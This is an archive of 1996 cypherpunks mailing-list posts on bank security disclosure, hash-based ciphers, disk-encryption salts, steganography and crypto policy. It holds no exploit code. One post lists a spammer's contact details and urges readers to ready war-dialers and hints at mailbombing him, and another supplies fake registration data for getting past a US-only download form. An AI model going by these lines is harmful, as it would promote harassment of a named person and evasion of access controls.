Message-ID: <199607181605.MAA02021@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



=?ISO-8859-1?Q?J=FCri_Kaljundi?= writes:
> There must be something wrong with bank people all over the world. One
> local bank that now is offering payments using their WWW server here in
> Estonia, and every time I publicly announce some security flaw in their
> system, I have to convince them this bug really exists, they never want to
> believe me.

I would suggest a much simpler technique.

Explain to them the next time you point out a flaw, that you will be
explaining these flaws by publishing exploits in the local newspaper,
and that all future flaws will be explained in the newspapers until
such time as they begin to take you seriously.

> What might be a good reward for hacking into an Internet bank and
> showing I can steal their money?

Don't bother. Just describe the flaws in public enough, and then you
have no risk because you are not committing a crime, and you have a
gain because you get an increase in your reputation for supplying
accurate information.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Fri, 19 Jul 1996 07:22:54 +0800
To: mac-crypto@thumper.vmeng.com
Subject: Mac Crypto/ internet commerce workshop , sept 5-6, cupertino..
Message-ID: <v0300760aae1448d45db3@[17.203.21.77]>
MIME-Version: 1.0
Content-Type: text/plain


The Mac Crypto  / Internet commerce workshop,( gathering, conference) will
happen...YES (if more like machack than anything else.)

The dates will be Sept 5/6, Here in Cupertino, CA at Apple.

In addition I will also host the Aug (late) or Sept Cypher-punks meeting
one of those nights too.

My goals are:

1) to provide a vehicle to educate any and all Apple employees and
Developers who are responsible for apple's future on the internet about
what is going on in the Internet commerce world.

2) To provide a forum where developers can work together to create internet
commerce producs for the Macintosh platform.

I am responding to the copious  feedback that I have recieved from
developers  both at WWDC and MacHack, through the various mailing lists
that I run (Mac-crypto, net-thinkers etc) and through personal contacts.

>>>>>>>>  I am looking for folks to talk, papers etc.. <<<<<<<<<

The (real)  prelminary agenda goes something like:

(day one) Introductions and overviews:

1) Introduction to crypto technology, what is it who are the players.

2) Introduction to electronic commerce (Finacial cryptograpy), e-cash,
e-checks, digital bearer bonds, etc.

3) How to use this technology today,  where is the oppertunities.

4) What needs to be done on the Mac, oppertnunites.

(day two) Tech stuff.

1) Random number generation on the Mac, (the key to strong crypto)

2) Password management and the Mac (How to get something better than the
Powertalk keychain)

3) Optimizing crypto on the PPC.

4) How to write a OT network server that will give you the  performance
required for transacting business.


remember this is a totatly grass-roots thing, but we are gathering
momentum. Look at how effective Internet-config is on the Mac.  The
conference will materialize more in August,  consider this an official
anouncement.

So book your air tickets, while they are cheap.. (bring a parachute?)


be there, aloha!


Vinnie Moscaritolo
Developer Tech Support
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 19 Jul 1996 05:14:01 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Mail-order Ph.D.'s
In-Reply-To: <sNg0qD168w165w@bwalk.dm.com>
Message-ID: <199607181618.MAA11826@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> I've received an obnoxious e-mail signed by *Dr.* David Sternlight. :-)
> 
> David, did you buy your sheepskin in a pizzeria? How much did you pay?

Oh Gawd, NOW you've done it.....

We will NOW get treated to UnProfessor's SternFUD's entire life history.

How he went & designed the first rockets, then gave the idea to
Goddard. Then he went to England and invented tea. Next he came
back & was a personal advisor for Tricky Dick. Later, he discovered
the oil in Alaska. In the middle he invented the concept of
money....

Dimitri, did you HAVE to do that?

BTW, I'm thinking of starting a pool on how long 'til 
	a) FUD launches his first 'Punk Plonk.
	b) He goes away, for a while.

Both are 100% sure things; the only odds are WHEN...
Write me off the list if you are interested....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Fri, 19 Jul 1996 05:24:57 +0800
To: EVERHART@Arisia.GCE.Com
Subject: Re: Making encoding out of an authentication cipher
Message-ID: <199607181647.MAA02366@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: EVERHART@Arisia.GCE.Com, cypherpunks@toad.com
Date: Thu Jul 18 12:44:15 1996
> Suppose you have a secure hash function H(msg) that delivers a random
> long period set of hash bits for msg, which is computationally infeasible
> to invert and such that the value of H(msg) depends very sensitively on
> all bits of msg. These things are used for authentication and tend to
>  be
> all over the world.
> 
> Now suppose I have a key and apply the following transform, where "+"
> will mean binary exclusive OR.
> 
> Cipher:
> H(key) + M(1)    = C(1)
> H(key+M(1)) + M(2) = C(2)
> H(key+M(2)) + M(3) = C(3)
> 
> and so on where M(n) is the message and C is the enciphered message.
> 
> Decipher:
> 
> H(key)      + C(1)  = M(1)
> H(key+M(1)) + C(2)  = M(2)
> H(key+M(2)) + C(3)  = M(3)
> 
> and so on.
> 
> If the hash function is cryptographically strong, is this or is this
>  not
> a strong cipher? Are there fast hash functions around?
> 

This, along with several other methods (Karn, Luby-Rackoff and MDC are 
some others) have been suggested in order to convert a hash function into 
and encryption algorithm.  And while the method you suggest has not been 
broken (at least to my knowledge) there are at least two major problems:

1. It is slow.  This method would appear to be approximately the speed of 
MDC.  And MDC (using SHA, what appears to be the most secure hash) is (very 
roughly) 5 times slower than Blowfish and 3 times slower than IDEA.  And 
although MDC is faster than 3DES in software, 3DES could easily outpace MDC 
in hardware.

2. (To directly quote Bruce Schneier from Applied Cryptography, page 353) 
"While these constructions can be secure, they depend on the choice of the 
underlying hash function.  A good one-way hash function doesn't necessarily 
make a secure encryption algorithm.  Cryptographic requirements are 
different.  For example, linear cryptoanalysis is not a viable attack 
against one-way hash functions, but works against encryption algorithms."  
(Any typos are mine.)

- --
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMe5p4uSLhCBkWOspAQFzLQf+J7VGyboBIb4/x2uT3ACs/xgMP11EnggF
6xnrT/TalqJofF1KcEGa3+DgfRRSAn0lxe2jGnLRCAj85zNwXNBy6V4A9pr/0Ldg
lD0aHpDFBRXZngqHtCANce8OJvC/EwPbotOuFR+V2vwrB7CHD+4XlNxcfcWDZN7i
/ffD6YdUnOpKtvj5ElmPmbOfODC10XD35nRbu1NMurmJQESA14Ohzk9KhRzVkNtv
pYkwcCqkR2kWGnWSkew9Zfw4U+IOdFiwb9etgiOEl86hM38cK1SM1RxArEfW3vIw
k2EM6o/rF4OIiDUYlJ3STxYAn7kAnOQ6PeYeUu48WmX1Y3q05qmFrQ==
=Hj2r
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 18 Jul 1996 22:10:36 +0800
To: Alex de Joode <usura@replay.com>
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
In-Reply-To: <199607180929.LAA03315@basement.replay.com>
Message-ID: <199607181115.NAA10074@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Someone wrote something like:
>
> : It's like giving Microsoft a trademark on the term 'Email'...  It's nuts!
> : Was the term ecash not in use before DigiCash showed up on the scene? 


I don't know, was it?  Let's say that DigiCash was founded six
years ago (1990).  Anyone have any references?


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMe4cykjbHy8sKZitAQELfgL9F/qHKfS9MtcEgWSGdFJ0wK5UmLJpxPKo
LpF6z8xrwl5IwyJGtAGOUV3qtemoAfN8sP4323eozvWCpXPQfkNGowUmymVm5BF2
Qi/41Mtv6T5xYq7tH0u1u2G1KTMDdIq6
=FonC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 19 Jul 1996 05:23:37 +0800
To: cypherpunks@toad.com
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <Pine.GSO.3.93.960718180020.10966B-100000@nebula.online.ee>
Message-ID: <v0300760bae1421a19857@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 PM -0400 7/18/96, Perry E. Metzger wrote:
> I would suggest a much simpler technique.
>
> Explain to them the next time you point out a flaw, that you will be
> explaining these flaws by publishing exploits in the local newspaper,
> and that all future flaws will be explained in the newspapers until
> such time as they begin to take you seriously.

Frankly, newspapers sound like too much work. Just post them here. That
should get their attention. It worked for Ian. :-).

Sort of like the old Alaskan bumper sticker: "Eat caribou. 10,000 wolves
can't be wrong."

Well, maybe it's a non-sequitur. But, I did think "1,000 Cypherpunks"
before remembering said bumpersticker from my childhood. Which is close
enough, I figure... :-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erika <esherman@umich.edu>
Date: Fri, 19 Jul 1996 05:18:02 +0800
To: Anonymous <nobody@zifi.genetics.utah.edu>
Subject: RE: Cypherpunks and Toad.com
In-Reply-To: <199607181616.KAA13409@zifi.genetics.utah.edu>
Message-ID: <Pine.SOL.3.91.960718132227.16812D-100000@frogger.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


And if the e-mail group moves from one server to another, the tshirts 
will be wrong..

On Thu, 18 Jul 1996, Anonymous wrote:

> root@HellSpawn wrote:
> 
> >I'd like to put the words 
> >
> >Cypherpunks@toad.com
> >
> >On a tee-shirt.  Is cypherpunks, toad.com, or the combination thereof 
> >copyrighted or trademarked or otherwise limited for use? 
> 
> Not that I know of, and you are of course free to do anything you want,
> but I urge you to leave off the "@toad.com" to prevent clueless subscription
> requests/noise. There are a number of cpunk tshirts already, one of which
> contains TCM's sigfile, so the word is likely not copyrighted???
> 
> 
> 
> 
> 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: talon57@well.com
Date: Fri, 19 Jul 1996 10:15:01 +0800
To: cypherpunks@toad.com
Subject: RE: ABC news on Internet Telephony
Message-ID: <199607182054.NAA04198@well.com>
MIME-Version: 1.0
Content-Type: text/plain



David Sternlight writes:

>There's something fundamental going on here beneath the surface.
>Surprisingly, a recent item (maybe the one you reported) on this
>suggests that the big phone companies are trying to use this
>phenomenon rather than stop it. I think it was AT&T who announced
>that they had web software that improved the quality of such
>internet voice calls. Surprisingly constructive, in contrast to
>the coalition of small phone companies screaming for the FCC to
>"stop it". The FCC has wisely said they're not going to act right
>now because it could kill an incipient new technology.

There is something fundamental going on here, a lack of common
sense, and/or critical reasoning.

Lets try it again. Who is the most likely to be disintermediated by
a global packet network? (how do you get to your ISP?)

I assume by "big phone company" vs "little phone company" you are
refering to long distance vs local service, tell me, if the RBOC's
continue merging, at what level do they become a " big phone
company."

 The RBOC's are not the only local service providers of course,
here in Illinois alone there are more than 80 (at my last count)
providers of local service, and soon there will be many more.

The other "urban myth" you are helping to support is the notion
that it is the local providers that are fighting deregulation.
Ameritech filed for total unbundling in March of '93, and you don't
see them insisting on having a percentage of the long distance
market before the long distance companies are allowed to compete in
the local loop.

>This is the rankest speculation on my part, but could some of the
>bigger, smarter phone company cum internet providers have done
>some serious analysis and concluded that we're moving away from
>distance-based rates for voice calls. Might they even have
>examined where we'll be in the next ten years (with ADSL, etc.)
>and decided that the network technology and simple market
>economics makes fixed charges per "line" more profitable to them
>than metered usage? Maybe this is wishful thinking on my part, but
>some of the bigger actors are starting to behave in a surprisingly
>counter-intuitive (based on the way we stereotype them) fashion on
>this topic.


point to point circuits are more efficiently handled by circuit
switching rather than packet switching networks. Nicholas
Negroponte wrote an interesting piece about asynchronous vs
synchronous, I believe it is in his book "Being Digital." 

ADSL is an interesting attempt at digital telephony but expensive
and basically would mean replacing existing central office
switches. (backbone bandwidth) 

In a packet network you have to either dedicate a portion of the
bandwidth for a synchronous circuit, or you have to have a very
fast network and use very small packets (ATM), expensive either
way.

A single central office has many times the bandwidth of the widest
part of the internet, and the average state has hundreds of CO's.
If even a small portion of the Internets current users tried
placing a call things would grind to a halt. A huge increase in the
number of backbones and their bandwidth would solve this, but who
will pay the bill? 

TANSTAAFL

Sometime ago the discussion was on the cost of laying new fiber,
may I suggest  the realworld heuristic of "a million dollars a
mile."

Please note I am not trying to make fun of anyone personnally, I am
in the words of Jubal Harshaw "heaping scorn upon an inexcuseably
silly idea, a practice I shall always follow."

Brian
communicate globally, censor locally




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 19 Jul 1996 09:52:58 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: Gorelick testifies before Senate, unveils new executive order
Message-ID: <199607182057.NAA18681@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:04 AM 7/18/96 -0700, David Sternlight wrote:

>Serious studies have shown that the kinds of protections to make the
>systems we depend on robust against determined and malicious attackers (say
>a terrorist government, or one bent on doing a lot of damage in retaliation
>for one of our policies they don't like)

"Policies"?  There you go again.   A "policy," at least in regard to the US 
government, is not merely opinion, but is action.  Action which may 
(legitimately) anger people.  Action which may not genuinely be in the 
interests of American people, although you'd never get those government 
thugs to admit it.  If somebody overseas doesn't like a US government 
"policy," maybe the best thing to do is to determine whether it's actually 
beneficial to the ordinary American citizen, or whether its benefits can be 
achieved simply by changing government behavior.

So what's the best way to avoid "terrorism"?  Maybe the fastest, more 
efficent, and overall best way to avoid it is to get the US government to 
stop doing things that foment it, rather than trying to protect against it 
after the fact.


, have costs beyond the capability
>of individual private sector actors. Your friendly neighborhood ISP, for
>instance, probably can't affort the iron belt and steel suspenders needed
>to make his system and its connectivity sabotage-proof, and so on. Even
>cheap but clever solutions involving encryption in such systems require
>standards and common practices across many institutions.

None of which require government actions to achieve.  If anything, what is 
required is that governments STOP doing things which discourage such 
implementations of encryption.  Government is the problem, not the solution.


>In such a case, where public benefits from government action greatly exceed
>public (taxpayer) costs,

This is the classic Sternlight misrepresentation.  Chances are excellent 
that this public benefit you speak of is almost totally a benefit to 
government employees, not ordinary citizens.  Government's "solutions" are 
predictably skewed to maintain government budgets, not actually designed to 
solve the underlying problem.  



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Fri, 19 Jul 1996 07:02:41 +0800
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: spam suckers (was Re: Chancellor Group....)
In-Reply-To: <doug-9606181411.AA022412492@netman.eng.auburn.edu>
Message-ID: <Pine.SCO.3.93.960718132016.18200A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jul 1996, Doug Hughes wrote:

> >	FYI: I've been forwarding complaints about the moneyworld spam
> >to the following addresses:
> >
> >dyno@cyberspace.com
> >barer@cyberspace.com
> >abuse@mci.net
> >enforcement@sec.gov
> 
<snip>
> I don't know who the right person to complain to is, but it sure is
> irritating. I think I'll start CC'ing abuse@mci.net as well.

The Oracle of the Internet (and other sources) report that:

The spam is coming from Financial Connections, Inc.
Their smail address is:
   2508 5th Avenue, Suite 104
   Seattle, Washington 98121

Their SA is Robert (Bob) Williams.  His voice mail box, available at
206.269.0846, is full right now but get those war-dialers ready just in
case.

Also, his e-mail address is "dyno@cyberspace.com".  It's not known if he
has any anti-mailbomb fixtures (yet) in place at this time.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 18 Jul 1996 23:08:27 +0800
To: cypherpunks@toad.com
Subject: (fwd) Re: US versions of Netscape now available---NOT
Message-ID: <199607181206.OAA14091@basement.replay.com>
MIME-Version: 1.0
Content-Type: text


Sternlight writes:

: >>Yes.  We've had a few thousand people download it.  Unfortunately, we
: >>only have one machine serving downloads right now, and it tends to melt
: >>down a couple times a day.
: >
: >I've tried four times, and each time has timed out. (That is, I've filled
: >out the Web form four times and tried n times each iteration...at least I
: >get to experiment with variations on my name and address each time :-})
: >
: >I guess I'll have to connect to the Italian and/or Swedish sites again. Has
: >the software arrived there yet?
: 
: Very droll. I had no trouble downloading it first try. Perhaps you should
: switch to Netcom. :-)
: 

Tim you may use this as entry data:

   Whatever YaKnow
   cybernut@nutcom.com
   10401 Wilshire Blvd, Suite 805
   Los Angeles, CA 90024-4628
   (310) 475-3799


Your friend.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 19 Jul 1996 06:58:49 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: New Infowarfare Panel
In-Reply-To: <v03007607ae142d52fbb1@[192.187.162.15]>
Message-ID: <31EE8BCE.50B@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight wrote:

> As I recall my background reading in the public press, wasn't the etiology
> that we figured out how to do some pretty nasty things (the Gulf war was
> one presenting occasion) to enemies' info infrastructures to threaten their
> entire social system.

My personal recollection is that many of the InfoWar techniques we crafted
during the Gulf War involved using high speed fighter-bomber aircraft to
drop guided munitions on top of selected pieces of the communications
infrastructure.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 09:09:57 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: New Infowarfare Panel
In-Reply-To: <v03007607ae142d52fbb1@[192.187.162.15]>
Message-ID: <v03007600ae14596455b3@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:09 PM -0700 7/18/96, Mike McNally wrote:
>David Sternlight wrote:
>
>> As I recall my background reading in the public press, wasn't the etiology
>> that we figured out how to do some pretty nasty things (the Gulf war was
>> one presenting occasion) to enemies' info infrastructures to threaten their
>> entire social system.
>
>My personal recollection is that many of the InfoWar techniques we crafted
>during the Gulf War involved using high speed fighter-bomber aircraft to
>drop guided munitions on top of selected pieces of the communications
>infrastructure.

I'm talking about some of the information that started slowly leaking out
later, not the prime-time TV pyrotechnics.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick May <pjm@spe.com>
Date: Fri, 19 Jul 1996 10:12:30 +0800
To: jk@stallion.ee
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <199607181335.JAA28123@arkady.hygnet.com>
Message-ID: <199607182142.OAA01934@gulch.spe.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jk@stallion.ee writes:
 > There must be something wrong with bank people all over the world. One
 > local bank that now is offering payments using their WWW server here in
 > Estonia, and every time I publicly announce some security flaw in their
 > system, I have to convince them this bug really exists, they never want to
 > believe me. Also those bank persons are saying they will believe me only
 > when I really break into their system and transfer money from somewhere
 > else's account. It just seems the reward they are offering me is not
 > enough for my work. What might be a good reward for hacking into an
 > Internet bank and showing I can steal their money?

     Probably not as high as the reward for hacking into a bank and
not showing them that you can steal their money.

Regards,

pjm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAwUBMe6vumAA81GB0e9dAQHrFgf+N1hMc+4/L3v9kBZAa2+IvoaoW4nqOXhW
8vRxzXFbJZXH0AGQzptIsoHS2o3Pp66qG6cKdI87taDuO8qaGmP4mxiCrK89jmo+
fsy1OUJf+7531tvahrNe984F5UAUw0pNFx728PzCwOeYaI57zhq4UhkSdtbHoI9h
WOWV1649x2AIp1odYiZ7y4+54KSkQf4e846pEMNujil6+BMdFOI1XZgYU0jX0rqS
Wq0qh6QtXMoQ3oF3sHmnR0BISGrIPwZEASVRxiKBvu26gAzH620uBOBLKtY6i/yr
G7O2C+fit5aHAoOJxIC8O9RhyrUOAqUe5peYfzzMVWGO5wMOdOu/7Q==
=/xyE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 19 Jul 1996 07:11:48 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: SecureDrive(IDEA), Realdeal and plaintext attack
In-Reply-To: <9607181432.AB05188@cti02.citenet.net>
Message-ID: <Pine.LNX.3.94.960718144353.370A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 18 Jul 1996, Jean-Francois Avon wrote:

> IDEA is reputed to be resistant against known plaintext attacks.
> But I did not read about wether or not it is resistant to 
> several-plaintexts (?choosen plaintext) attack.
> 
> If the sectors were not salted, each zeroed sectors would translate in 
> an identical way on the encrypted disk.  So, there would be only one 
> cyphertext-plaintext pair repeated over many empty sectors.
> 
> If you salt the encryptor, there are many different cyphertexts 
> corresponding to one single plaintext.
> 
> Can the salt be figured out by an attacker?

It doesn't matter whether an attacker knows the salt.  Sectors that are zeroed
are indistinguishable from secrtors that have data.  An attacker wouldn't know
which sectors are composed of zeroes.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMe6HIbZc+sv5siulAQHpIgP+L8fJC/NMixjiQxdHuIJAkPxKqWpY3PBC
KlqubQddtQG5CYWEjmC3aLks/kBVHLw/WGg7QM4C3Hl6Hmp/X85qiNCME6rhYjZq
1Jqbit1FVRHOEz9Nw7suOZlabHkQDTx9mEYvq0bWtAlPRXizWz60UwBt5W+n3SBT
hpO/gwkvWs4=
=4raq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 19 Jul 1996 08:25:35 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <9606188377.AA837727446@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



At 4:13 AM on 96/07/18 Timothy C. May wrote:

>It's a mark of what has gone wrong with this country that >ordinary citizens
actually fear the midnight raids, the no-knock >searches, the "threat
suppression" by ninjas.

I recommend an article sub-titled: Fourteen ways of looking at a blackshirt.
I've excerpted particularily relevant pieces below.

Eternal Fascism
by Umberto Eco
New York Review of Books (June 22, 1995)

In spite of some fuziness regarding the difference between various historical
forms of fascism, I think it is possible to outline a list of features that are
typical of what I would like to call Ur-Fascism, or Eternal Fascism. These
features cannot be organized into a system; any of them contradict each other,
and are also typical of other kinds of despotism or fanaticism. But it is enough
that one of them to be present to allow fascism to coagulate around it.
[...]
3. Irrationalism also depends on the cult of action for action's sake. Action
being beuatiful in itself, it must be taken before, or without, reflection.
Thinking is a form of emasculation. [...]

4. The critical spirit makes distinctions, and to distinguish is a sign of
modernism. In modern culture the scientific community praises disagreement as a
way to improve knowledge. For Ur-Fascism, disagreement is treason.

5. Besides, disagreement is a sign of diversity. Ur-Fascism grows up and seeks
consensus by exploiting and exacerbating the natural fear of difference. The
first appeal of a fascist or prematurely fascist movement is an appeal against
the intruders. Thus Ur-Fascism is racist by definition.

6. Ur-Fascism derive from individual or social frustration. [...]

11. In such a perspective everybody is educated to become a hero. In every
mythology the hero is an exceptional being, but in Ur-Fascist ideology heroism
is the norm. This cult of heroism is strictly linked with the cult of death. It
is not by chance that a motto of the Spanish Falangists was Viva la Muerte
("Long Live Death!"). In nonfascist societies, the lay public is told that death
is unpleasant but must be faced with dignity; believers are told that it is the
painful way to reach a supernatural hapiness. By contrast, the Ur-Fascist hero
craves heroic death, advertised as the best reward for a heroic life. The
Ur-Fascist hero is impatient to die. In his impatience, he more frequently sends
other people to death. [...]

Franklin Roosevelt's words of November 4, 1938, are worth recalling: "If
American democracy ceases to move forward as a living force, seeking day and
night by *peaceful means* (emphasis mine) to better the lot of our citizens,
fascism will grow in strength in our land." Freedom and liberation are an
unending task.

----------------------

If you set out to defeat an enemy because you despise what they do or say, make
sure that you are different - not just stronger.

Ciao,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 19 Jul 1996 07:18:28 +0800
To: cypherpunks@toad.com
Subject: Steganography
Message-ID: <Pine.LNX.3.94.960718144957.370B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There has been some discussion on steganography in the past few days.  I've
been thinking about the subject so here is a list of my random thoughts:

1. Steganography "standard": Current steganography software relies almost
totally on security through obscurity.  The problem with such an approach is
that there is no standard way to extract data from .gif or .jpg files.  If
two people want to communicate using stego, they have to have some secure
channel through which they could negotiate a protocol that could extract
information from data files.  This brings up the same Catch-22 situation that
exists with conventional cryptography.

My idea is that there should be some common, well-known way to de-stego data
files.  This really doesn't weaken the security of any stego software because
if strong crypto that doesn't append any headers on to the message is used in
conjunction with stego software, then the output of a stego program would just
appear to be random garbage.  There would be no way for the feds to prove that
the random data was encrypted.  I don't know much about graphic and sound file
formats, but I think that in most cases the least-significant bit of a graphics
or sound file should be pretty random anyway.

2. Recognizing stegoed data: Another problem with stegonography is that while
many programs use some kind of identifying header so the recipient can tell
whether the file contains hidden information or not, this also allows a snooper
to determine the same thing.  I think that the ability for the recipient to
identify whether the data is stegoed or not is important.  So I came up with
the idea of using a MAC keyed with the session key used to encrypt the hidden
data for checking if the picture contains stegoed data.  With this approach,
an attacker would not be able to verify if a file contained hidden data or not
since the session key would be encrypted with the recipient's public key.

3. Message pools: With steganography more widespread, the use of message pools
becomes a lot more interesting.  People could communicate anonymously using one
of the alt.binaries.* groups with everyone else reading the group completely
oblivious to this fact.  The posts would be pictures that would decode
normally, but only the recipient would be able to decrypt the hidden data.
Since the binaries newsgroups are among the most popular on the Usenet, reading
one of the binaries newsgroups would draw less suspicion then reading
alt.anonymous.messages.  I don't know how reliable some of the binaries groups
are since many NNTP servers don't carry them or expire the articles early, but
since cross-posting seems to be fairly common on those newsgroups anyway, a
cross-posted file with stegoed data would have a good chance of reaching the
recipient.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMe6OdLZc+sv5siulAQHMOAP/Yv6SLWY/CCXzXj/91q0hh2M3oVjMr7a6
RBEKCaExosbjJojoTlM9epyzO/gC4jrAj+3IIeciPLHyJPgF2CJmW3NU4bRHPls5
d2kEUPCIc/mLVcbieEC4OO7QlYeFY0vIBn+y1CO3V0kLN20N6Y3845p4a7BY6Wa+
u7dE12QbZLc=
=8xQ7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 12:17:19 +0800
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007608ae142fe9978b@[192.187.162.15]>
Message-ID: <v03007603ae14644ce4b1@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:32 PM -0700 7/18/96, Jeff Barber wrote:
>David Sternlight writes:
>>
>> At 8:14 AM -0700 7/18/96, Jeff Barber wrote:
>> >David Sternlight writes:
>> >
>> >> Here's the problem in a nutshell: Everyone who has looked at our systems,
>> >> from Cliff Stoll on to blue ribbon scientific commissions, has come
>>to the
>> >> conclusion that our society is vulnerable to willful sabotage from
>>abroad,
>> >> ranging from information sabotage (hacking electronic financial
>> >> transactions) to physical sabotage (hacking power grid control
>>computers to
>> >> cause widespread power failures leading to serious damage to people and
>> >> things; hacking the phone companies' computers, etc.). Some cases have
>> >> already been observed. The field has already got a name and lots of
>> >> publications. It's called "information warfare" and the government is
>> >> taking it VERY seriously.
>
>> >I for one reject your premise and your conclusions.  There is no
>> >indication that government is capable of addressing this "problem"
>> >in a useful way.
>>
>> Let's see what the study group recommends. There are a lot of things the
>> government can do, and plenty of historical precedent.
>
>There *are* a lot of things government can do.  There aren't a lot of
>things it can do well.  But you want to wait and see what a *government
>study group* decides to recommend?  Gee, who can guess what they'll decide?

You should do your homework. It's going to have a lot of industry people on
it and be chaired by an industry person.

>
>
>>                                                        To take one example,
>> in the merchant marine industry the government for years paid a subsidy for
